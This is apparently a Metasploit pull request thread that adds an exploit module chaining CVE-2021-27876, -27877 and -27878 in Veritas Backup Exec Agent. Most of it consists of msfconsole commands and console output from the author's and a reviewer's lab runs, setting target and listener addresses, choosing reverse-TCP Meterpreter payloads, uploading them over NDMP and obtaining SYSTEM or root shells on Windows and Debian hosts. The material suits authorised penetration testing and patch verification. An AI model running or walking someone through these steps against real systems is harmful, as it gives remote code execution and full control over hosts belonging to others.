Veritas Backup Exec Agent Authentication Bypass RCE

[c0rs]

Add Veritas Backup Exec Agent Remote Code Execution exploit.

The module allows to exploit a chain of the vulnerabilities CVE-2021-27876, 
CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent (up to
version 21.2 or agent revision 9.4) which leads to remote code execution with
privileges of system user (`NT AUTHORITY\SYSTEM` or `root`) by default.

This module has been tested successfully on Windows 7 Ultimate (6.1.7601
Service Pack 1 Build 7601) and Debian 9 (x86_64) with kernel version
4.9.0-13-amd64.

Veritas Security Bulletin: https://www.veritas.com/content/support/en_US/security/VTS21-001

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/multi/veritas/beagent_sha_auth_rce
• set RHOSTS <TARGET_IP>
• set TARGET <OS_NAME>
• set PAYLOAD <PAYLOAD_NAME>
• exploit
• Verify you get a NT AUTHORITY\SYSTEM or root session

Scenarios

msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.141
RHOSTS => 172.16.180.141
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check

[*] 172.16.180.141:10000 - Checking vulnerability
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Getting supported authentication types
Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
BE agent revision: 9.3
[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Windows
TARGET => Windows
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
LHOST => 172.16.180.248
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 

Module options (exploit/multi/veritas/beagent_sha_auth_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    10000            yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 172.16.180.248:4444 
[*] 172.16.180.141:10000 - Exploiting ...
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
[*] 172.16.180.141:10000 - Passing SHA authentication
[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 172.16.180.141
[*] Meterpreter session 2 opened (172.16.180.248:4444 -> 172.16.180.141:49630) at 2022-09-12 01:44:44 +0300

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[jheysel-r7]

@c0rs, thanks for the awesome contribution. I tested on windows and linux installs and they both worked without any issues 👍 Just a couple small suggestions. If you do accept some of the suggestions you'll have to update the console output in the Scenarios section of the documentation. Other than that I think this is good to ship.

Windows:

msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
rhosts => 192.168.123.147
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.147:10000 - Checking vulnerability
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Getting supported authentication types
[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 192.168.123.147:10000 - BE agent revision: 9.3
[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 192.168.123.147:10000 - Exploiting ...
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
[*] 192.168.123.147:10000 - Passing SHA authentication
[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 192.168.123.147
[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-BE1QFC9
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.123.147 - Meterpreter session 5 closed.  Reason: User exit

Linux:

msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
rhosts => 172.16.199.133
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
target => 1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > reload
[*] Reloading module...
run
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.133:10000 - Checking vulnerability
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Getting supported authentication types
[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
[*] 172.16.199.133:10000 - BE agent revision: 9.3
[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 172.16.199.133:10000 - Exploiting ...
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
[*] 172.16.199.133:10000 - Passing SHA authentication
[*] 172.16.199.133:10000 - Uploading payload with CmdStager
[*] 172.16.199.133:10000 - Command Stager progress -  44.15% done (362/820 bytes)
[*] Sending stage (3020772 bytes) to 172.16.199.133
[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfop
[-] Unknown command: sysinfop
meterpreter > sysinfo
Computer     : debian.test.com
OS           : Debian 9.13 (Linux 4.9.0-19-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter > exit
[*] Shutting down Meterpreter...

[jheysel-r7]

Release Notes

This module exploits a chain of the vulnerabilities CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent which leads to remote code execution with privileges of system or root user